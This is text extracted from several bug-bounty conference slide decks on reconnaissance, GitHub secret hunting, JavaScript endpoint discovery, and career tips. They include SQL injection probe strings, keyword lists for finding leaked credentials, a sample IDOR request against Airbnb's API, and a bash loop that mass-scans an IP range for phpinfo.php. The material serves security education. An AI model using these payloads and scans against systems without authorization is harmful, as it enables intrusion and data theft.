python ~/tools/webscreenshot/webscreenshot.py -o ./$1/screenshots/ -i ~/$1/$1.txt --timeout=10 -m
}
recon(){
certspotter $1
dirbruteforce $1
screenshot $1 Game changer
}
55 @nahamsec
Put your aliases together
recon(){
certspotter $1
dirbruteforce $1
screenshot $1
[...]
}
56 @nahamsec
LazyRecon
57 @nahamsec
LazyRecon
58 @nahamsec
LazyRecon
59 @nahamsec
60 @nahamsec
Digital Dumpster Diving
61
Digital Dumpster Diving
(I’m a pro at it)
62
Digital Dumpster Diving
● Leaked credentials
● Leaked api_tokens
● Leaked authorization headers
● […]
63 @nahamsec
Digital Dumpster Diving
● Leaked credentials
● Leaked api_tokens
● Leaked authorization headers
● […]
64 @nahamsec
Github Recon
Tools and Keywords
● gitrob
● git-all-secrets
● truffleHog
● git-secrets
● repo-supervisor
● Do it manually?
65 @nahamsec
APP_SECRET
Github Recon consumerkey
JIRA_Password
Examples
jdbc
“authorization bearer”
● “company.com” “dev” auth_key
consumer_secret
● “dev.company.com” SECURITY-SIGNATURE
● “company.com” API_key X-API
X-Paypal
● “company.com” password secret_key
● “api.company.com” authorization JWK/JWT
SSO_LOGIN
● GET CREATIVE! defaultEndpointsProtocol
access_key
accountKey
AWS_Secret
aws_secret_access_key
rexis
api_key
66 @nahamsec
Archive.org (Wayback Machine)
67 @nahamsec
Archive.org
68 @nahamsec
Javascript Files
Why?
69 @nahamsec
Javascript Files
70 @nahamsec
Javascript Files
71 @nahamsec
Javascript Files
Examples
72 @nahamsec
Trello Boards
● Site:trello.com intext:ftp
● Site:trello.com intext:ORG
73 @nahamsec
Trello Boards
● Site:trello.com intext:ftp
● Site:trello.com intext:ORG
74 @nahamsec
Examples
75
Examples of Certificate
Transparency
76
Shodan Examples
Search Query: hostname:host.com port:15672
77 @nahamsec
Censys Examples
● Working example:
78 @nahamsec
Examples of
Discovering Endpoints
Hidden Inside of
Javascript Files
79
Airbnb – Web to App Phone Notification IDOR to view
Everyone’s Airbnb Messages
80 @nahamsec
Airbnb – Web to App Phone Notification IDOR to view
Everyone’s Airbnb Messages
API Requests
https://www.airbnb.com/api/v2/air_sms_notifications
81 @nahamsec
Airbnb – Web to App Phone Notification IDOR to view
Everyone’s Airbnb Messages
API Requests
https://www.airbnb.com/api/v2/air_push_notifications
82 @nahamsec
Airbnb – Web to App Phone Notification IDOR to view
Everyone’s Airbnb Messages
POST REQUEST:
{"_format":"for_visitor","country":"USA","phone_number":"","template":"messag
e","user_id":,"title":"","body":"","metadata":{},"object_id":"","status":"","
role":"","photo_url":""}
If you passed in an invalid template it would give you a list of all the valid templates that
you could send.
83 @nahamsec
84 @nahamsec
Airbnb – Web to App Phone Notification IDOR to view
Everyone’s Airbnb Messages
Then we found out we can send ourselves custom messages:
{"_format":"for_visitor","country":"USA","phone_numb
er":"","template":"custom","user_id":109764261,"stat
us":"test","title":"test","body:"test"}
85 @nahamsec
Airbnb – Web to App Phone Notification IDOR to view
Everyone’s Airbnb Messages
Then we found out we can send ourselves custom messages:
{"_format":"for_visitor","country":"USA","phone_numb
er":"","template":"custom","user_id":109764261,"stat
us":"test","title":"test","body:"test"}
86 @nahamsec
Airbnb – Web to App Phone Notification IDOR to view
Everyone’s Airbnb Messages
Then we found out we can send ourselves custom messages:
{"_format":"for_visitor","country":"USA","phone_numb
er":"","template":"custom","user_id":109764261,"stat
us":"test","title":"test","body:"test"}
87 @nahamsec
Airbnb – Web to App Phone Notification IDOR to view
Everyone’s Airbnb Messages
Then we found out we can send ourselves custom messages:
{"_format":"for_visitor","country":"USA","phone_numb
er":"","template":"custom","user_id":109764261,"stat
us":"test","title":"test","body:"test"}
88 @nahamsec
Examples of Digital
Dumpster Diving
89
Dumpster Diving Part 1
90 @nahamsec
Dumpster Diving Part 1
"server": {
"host": "dedXXXX.PATTERN.PROVIDER.com",
"port": 21,
"user": "some_username",
"password": "definitely_ftp_passwords"
}
91 @nahamsec
Dumpster Diving Part 1
"server": {
"host": "dedXXXX.PATTERN.PROVIDER.com",
"port": 21,
"user": "some_username",
"password": "definitely_ftp_passwords"
}
92 @nahamsec
Dumpster Diving Part 2
93 @nahamsec
Dumpster Diving Part 2
94 @nahamsec
Dumpster Diving Part 2
95 @nahamsec
Dumpster Diving Part 2
96 @nahamsec
Example of
Readable/Writable S3
Buckets
97
AWS CLI
98 @nahamsec
CNAME Pointing to Unclaimed AWS S3
99 @nahamsec
Recon Automation +
Github +
Exploitation
100
101@nahamsec
Access to all internal API endpoints?
102@nahamsec
Access to all internal API endpoints?
103@nahamsec
Access to all internal API endpoints?
● Looked for the: hostname+ internal + “auth-token” (on github and found this
handy curl command:
104@nahamsec
Access to all internal API endpoints?
105@nahamsec
Access to all internal API endpoints?
106@nahamsec
Access to all internal API endpoints?
curl -X GET
"https://devsomething.something.target.com/ internal/internal_somet
hing/internal_something_accounts" -H "SOME_KEYWORD-auth: INTERNAL"
-H "debug-token: SORRY_I_HAD_TO_REDACT"
107@nahamsec
Access to all internal API endpoints?
curl -X GET
"https://devsomething.something.target.com/ internal/internal_accou
nts" -H "SOME_KEYWORD-auth: INTERNAL" -H "debug-token:
SORRY_I_HAD_TO_REDACT"
108@nahamsec
Access to all internal API endpoints?
109@nahamsec
Keep in touch
110@nahamsec
Tools
● Dirsearch - https://github.com/maurosoria/dirsearch
● JSParser - http://github.com/nahamsec/jsparser
● LazyS3 - https://github.com/nahamsec/lazys3
● LazyRecon - https://github.com/nahamsec/lazyrecon
● Teh_s3_bucketeers - https://github.com/tomdev/teh_s3_bucketeers
111@nahamsec
Thank you
112@nahamsec
Thank You
113
Recon Like A Boss
More Targets- More Options-
More Opportunities
AGENDA
• Increase Your Attack Area
• Determine Technologies used by Website.
• Amazon Web Service (AWS) Recon & Hacking
• Github Recon
• Content Discovery
Increase Your
Attack Area
Recon- Go Back in Time
• Wayback Machine to view old files like robots.txt
and URLs
Recon- Go Back in Time
• Tools are out to automate this
• waybackurls.py
Download:
https://gist.github.com/mhmdiaa/adf6bff70142e5091792841d4b3720
50
• waybackrobots.py
Download:
https://gist.github.com/mhmdiaa/2742c5e147d49a804b408bfed3d32
d07
Now We Have
Waybackurls
Sub-domains Discovery
• Brute force on main domain
• Some scripts to automate this task
– Knockpy:-
https://github.com/guelfoweb/knock
– Sublist3r:-
https://github.com/aboul3la/Sublist3r
– SubBrute
https://github.com/TheRook/subbrute
Sub-domains Discovery
Knockpy
• Usage: ./knockpy target.com
Sub-domains Discovery
Sublist3r
• Usage: python sublist3r.py -d target.com
Sub-domains Discovery
Sublist3r Cont.
• Find sub-domains with specific open ports
• Usage: python sublist3r.py -d target.com -p 80,443
Sub-domains Discovery
SubBrute.
Tool: SubBrute
Usage:
./subbrute.py target.com > sudomains.txt
Then
./subbrute.py –t subdomains.txt
Now We Have
WaybackURls
+
Subdomains
+
Subdomains of Subdomains
Sub-domain Validation
Tool: EyeWitness (https://github.com/ChrisTruncer/EyeWitness)
(98.136.0.0 - 98.139.255.255)
Real Case Study
• And Finally
http://nc10.n9323.mail.ne1.yahoo.com/phpinfo.php
Bash Script
#!/bin/bash
for ipa in 98.13{6..9}.{0..255}.{0..255}; do
wget -t 1 -T 5 http://${ipa}/phpinfo.php; done&
1. Burp Suite
2. InputScanner (Zscanner)
3. JS-Scan
Find New Endpoints from JS Files
(Tools Intro.)
• Burp Suite: Proxy
AWS or S3 Buckets
Amazon Web Services
• AWS Simple Storage Service (often shortened
to S3) is used by companies that don’t want to
build and maintain their own storage
repositories
• By using Amazon Simple Storage Service, they
can store objects and files on a virtual server
instead of on physical racks
Amazon Web Services
• After the user has created their bucket, they
can start storing their source code,
certificates, passwords, content, databases
and other data.
Amazon Web Services
• API Endpoints
• Domain Patterns
Github Recon
• Go to github and search
Eg.
- “target.com” “dev”
- “dev.target.com”
- “target.com” API_key
- “target.com” password
- “api.target.com”
Github Recon
Github Recon
• Google can also help
Dork:
site: “github.com” + “Target” + password
Github Recon
Tools are out to automate this
• Gitrob
• Git-all-secrets
• truffleHog
• Git-secrets
• Repo-supervisor
• Do it manually [Best way]
❖ Email: prateek0490@gmail.com
Hey you! What’s Bug Bounty?
What’s Bug Bounty?
● XSS
● CSRF
● Subdomain Takeovers
○ Domains?
○ Subdomains?
○ 3rd Party Services used by Organisation (GitHub, Jira, Trello, Jenkins, GitLab, etc...)
○ IP Ranges?
Even though if an organization's Jira instance has an auth, administrators set up "public" projects, they
forget “public” means public for everyone. This could sometime give you keys to kingdom.
Trello, Jira, Gitlab ...
Thanks Ed :)
fofa.so - chinese version of shodan
shodan.io
IP Ranges
https://bgp.he.net/search?search%5Bsearch%5D=
Smule&commit=Search
IP Ranges
https://whois.arin.net/ui/query.do
IP Ranges
Sir, I’ve found the IP Space now what?
IP Range - now what?
● Fire NMap and run NSE Scripts on those discovered IP Ranges
○ BurpSuite
○ Dirsearch, Dirbuster
○ Wfuzz
Oh the mobile apps are in scope, what should I look
for?
Did you know? You can find leakage of sensitive data in mobile apps without even
installing them on your phone. Howwww?
Oh the mobile apps are in scope, what should I look
for?
Short Cut:
Oh the mobile apps are in scope, what should I look
for?
Long Route:
BURP SPIDER
● XSS
● SQLi
● Privilege Escalation
● IDOR(s)
● More Bugs
Hacking with BurpSuite
● Using “Repeater tab” to find XSS, SQLi, IDOR(s), Privilege Escalation
● Catch a Request which accepts user input and throw it into a repeater tab.
● Start Fuzzing the parameters.
Hacking with BurpSuite
SQLi(s)
id=1’
id=1‘’
id=1’-sleep(10)-’
id=1"
id=1"“
id=1"-sleep(10)-”
id=1/sleep(10)
Hacking with BurpSuite
● IDOR(s) are always easy, playing with the id parameters.
Manipulate the create requests.
● Have 2 different user accounts, one low privileged user and other one with some level
of permissions.
● Catch the request in BURPSUITE, throw them into a “Repeater tab” replace the
cookies of a high level privileged user with low level privileged user, see if it’s a
success!
Hacking with BurpSuite
JS for the WIN
https://github.com/GerbenJavado/LinkFinder
Feeding these in tool
python linkfinder.py -i /Desktop/z.burp -b -o cli
Shooting in Dark? Understand the application flow to
find bugs
Shooting in Dark? Understand the application flow to
find more bugs
You’re doing it wrong -
Found an internal
endpoint in JS and
immediately knew
what parameters to
use based on my past
research
Shooting in Dark? Understand the application flow to
find more bugs
Shooting in Dark? Understand the application flow to
find more bugs
Read the Docs = Get a BUG?
Shooting in Dark? Understand the application flow to
find more bugs
Few Nice Reads:
● Static Analysis of Client-Side JavaScript for pen testers and bug bounty
hunters -
https://blog.appsecco.com/static-analysis-of-client-side-javascript-for-pen-test
ers-and-bug-bounty-hunters-f1cb1a5d5288
● Discovering hidden endpoints using LinkFinder -
https://gerbenjavado.com/discovering-hidden-content-using-linkfinder/
● Getting started in Bug Bounty -
https://medium.com/@ehsahil/getting-started-in-bug-bounty-7052da28445a
Better Bug Bounty Report
better relationship
Better Bug Bounty Report
better relationship
better bounties
Sharing from other side of the fence
What you shouldn’t do?
Sharing from other side of the fence
● Bounty Plz!
● Introduction
● Details
● Steps to reproduce (POC)
● Impact
Sharing from other side of the fence
Before reporting, always think from organization’s point of view and think from the other side -
Seeing an image of other users on a company like Zomato? Seriously are you kidding me? That’s not sensitive at all -
Closing it as N/A
VS
Subscribe to topics
like Information
Security, Bug Bounty,
Infosec, etc..
Keeping up with new trends
Hacktivity! https://hackerone.com/hacktivity
ZERO DAILY!
https://hackerone.com/zerodaily
Profit!! Time to earn bounties...
Profit!! Time to earn bounties...
Profit!! Time to earn bounties...
LIVE BURP SUITE SESSION
#bugbountytip
#bugbountytip
#bugbountytip
#bugbountytip
Waybackurls
● Always run wfuzz / dirsearch on all subdomain(s) found to discover more content, more
bounties?
● Earlier this year, I got a bounty for redacted.corp.com/documentation and found an excel
spreadsheet of the database, eehhh, easy money 😳
● Can’t CSRF delete method? Few frameworks / API(s) allows to “fake” methods by additional
parameters, ex:
○ Adding a parameter such as: method=delete | _method=delete -> API will parse it as a
Delete request.
#bugbountytip
● Always check if Strict transport security is enforced? Many a times, hxxp://redacted.com is not
redirected to https, many companies are interested to hear about “Weak Login function over HTTP”.
Recap | Let’s Roll It Back
Prateek Tiwari
prateek0490@gmail.com
@prateek_0490
linkedin.com/in/prateek-tiwari-867b905a/
facebook.com/prateek0490
29/11/17
Journey to the top
on
CHCON 2017
29/11/17
o Ahmad Ashraff @yappare
o Origin : Malaysia About Me
o Education : Bachelor of Chemical Engineering
o Experience : +7 years in ITSec industry
o Current : Security Consultant at Aura Information
Security
o Hobbies : Backpacking, Watching Animes
CHCON 2017
CHCON 2017 29/11/17
About the Presentation
29/11/17
o What is bug bounty program
o Why I started bug hunting
o Problems and troubles – How I encountered them
o Tips and Tricks
o Hope people stop asking me “How many bugs did you found last weekend?”
CHCON 2017
29/11/17
What is bug bounty program?
https://en.oxforddictionaries.com/definition/bug_bounty
CHCON 2017
How companies manage bug bounty programs
29/11/17
Self-manage via 3rd Managed by 3rd
Own programs
party platform platform
CHCON 2017
Why I Started Bug Bounty?
29/11/17
Car/Transport Kids
Event
Married Study Loan
House
Gadgets
Travelling
Hobbies
Parents
CHCON 2017
$%#^#&
that might
~$850 paid per month happen
29/11/17
3rd August 2012
4 months later
CHCON 2017
1 XSS – Found in less than a day = $500
29/11/17
Monthly paid = ~$850
1 XSS in Paypal > Half of monthly paid
CHCON 2017
29/11/17
Study Loans
Personal Loans
CHCON 2017
Cars
Credit Cards
29/11/17
It is not just about money
CHCON 2017
Hi folks, meet…
Security
Joined at Teslaas
BugCrowd
Technical Operation
CHCON 2017
Doing windows server configuration review.
29/11/17
2015. 1st place. Looks good
CHCON 2017
Oct 2016 . Started to be a busy
guy. Lost from the radar.
29/11/17
A wizard
Normal human
being
Talented full-time
bughunter from UK
CHCON 2017
Anonymous
Attack-dev
https://bugcrowd.com/leaderboard
Public VS Private Programs in Bugcrowd
29/11/17
• Can participate once • Two types, ongoing & flex
registered (on-demand)
• Kudos/Rewards • Kudos/Rewards
• Tested multiple times • Web,mobile,hardware,API,
• Orgs ready to go to public IOT
• Web,mobile,hardware,API, • Tested few times or fresh
IOT • Orgs want to be tested by
trusted users
Public
Private
CHCON 2017
Problems..
29/11/17
Equipment and Tools
CHCON 2017
Problems
29/11/17
• Tough competition. Experts everywhere
CHCON 2017
• Fast and Furious. Really fast. Need to avoid duplicate
submission
29/11/17
5 MINUTES
30 MINUTES
CHCON 2017
55 MINUTES
Problems
29/11/17
Most programs start at UTC time zone
CHCON 2017
Me in NZST.
29/11/17
Able to optimize my free times and
use ~ 10 hours per week
CHCON 2017
CHCON 2017 29/11/17
Tips 1 – Focus on less participants
29/11/17
Mobile Applications
• Windows < iOS < Android
• Cert Pinning
Iot/Device
• Specific device need to be purchased
• Need knowledge, tools Preparing
is a mess
Scripts/Binary
CHCON 2017
• Dev knowledge, binary exploitation
• Fuzzing technique
Tips 1 – Focus on less participants
29/11/17
Wide targets -
Reverse recon automated+manual
CHCON 2017
29/11/17
Reverse recon
CHCON 2017
• Check on their production environment
• Check on their old sites of the production through wayback archive
• Check on their support/issues website
29/11/17
Can do this back to back
Automated Manually
Wide targets
- Google/Bing/Yahoo
*.blabla.com - Subdomain scanner
- Wayback archive
All BlaBla’s public - CMS scanner
- Github
websites - Known vulnerabilities - Support
CHCON 2017
• Threat Crowd. • HackerTarget
29/11/17
• Certificate Search • Google
(crt.sh) Transparency
• Censys Report
aquatone-discover • Shodan • DNSDB
• Riddler • VirusTotal
• PassiveTotal • Dictionary
• Netcraft
AQUATONE
aquatone-takeover Find misconfigured DNS setup
CHCON 2017
Access the discovered web ports and
aquatone-gather provide headers information plus
screenshot
https://github.com/michenriksen/aquatone
discovery
29/11/17
scanning
CHCON 2017
gathering
CHCON 2017 29/11/17
Tips 2 – Risk Matrix Used
29/11/17
P1 – 40 points + $1500
P2 – 20 points + $900
P3 – 10 points + $300
P4 – 10 points + $100
Bugcrowd’s VRT is a resource outlining Bugcrowd’s
P5 – 0 points + $0 baseline priority rating, including certain edge cases, for
vulnerabilities that we often see.
CHCON 2017
29/11/17
Cool
bugs
Not so-
cool
bugs
Not so-
cool
bugs
CHCON 2017
Cool
bugs
29/11/17
Still a P3 risk.
Still received the same points
CHCON 2017
29/11/17
CHCON 2017
Still received the points and rewards
Tips 3 – Do Not Stop at One Attack
29/11/17
http://www.brokensites.com/admin/login.php?redirect_url=/dashboard
P4 = 5 + $100
P3 = 10 + $300
Open
Lack of bruteforce
Redirect?
protection?
XSS?
Cleartext? Default/Weak P3 = 10 + $300
Creds? SSRF?
P4 = 5 + $100
P3 = 10 + $300 P1 = 40 + $1500
RCE?
P1 = 40 + $1500
CHCON 2017
Total points : 120
Total rewards: $4100
11/29/17
Same parameter, same program, different time of
submission, different attacks, 1 dupe, 1 valid. J
CHCON 2017
CHCON 2017 29/11/17
Tips 4 – Mobile View
29/11/17
• Redirected to main page
• Forbidden
• No Access
m.website.com
mobile.website.com
touch.website.com
www.website.com/m/
www.website.com/mobile
• Redirected to mobile
page
• New session cookies?
• More features
CHCON 2017
• More user inputs
• Lack of security checks
CHCON 2017 29/11/17
Tips 5 – Be Friend with JS Files
29/11/17
Time consuming, but it is worth your effort
CHCON 2017
• Hardcoded credentials
• Backup/Github/Dev sites
• Method of encryption
29/11/17
View source > find .js > analyse
CHCON 2017
https://bountysite.com/admin/dashboard?redirect=/
29/11/17
Check on login.js
https://bountysite.com/admin/dashboard/js/login.js
Check
on
another
https://bountysite.com/admin/dashboard/photography/loginx
JS
CHCON 2017
P1 = 40 + $1000
Tips X – Out of Scope
29/11/17
Some of the programs have a number of out of scope issues that they don’t want to see.
CHCON 2017
I don’t participate.
List of tools
29/11/17
?
• Burp Suite Pro
• Recon tools
Aquatone - https://github.com/michenriksen/aquatone
Spiderfoot - http://www.spiderfoot.net/
Enumall - https://github.com/jhaddix/domain
Sublist3r - https://github.com/aboul3la/Sublist3r
• Scanning tools
WPScan - https://wpscan.org/
Droopescan - https://github.com/droope/droopescan
SQLMap - http://sqlmap.org/
OXML_XXE- https://github.com/BuffaloWill/oxml_xxe
• JS Parser
CHCON 2017
https://github.com/zseano/JS-Scan
https://github.com/nahamsec/JSParser
11/29/17
Thank you to
• Christchurch Conference 2017
• Aura Information Security
• BugCrowd
• Bug hunters all over the world
• BurpSuite Pro
CHCON 2017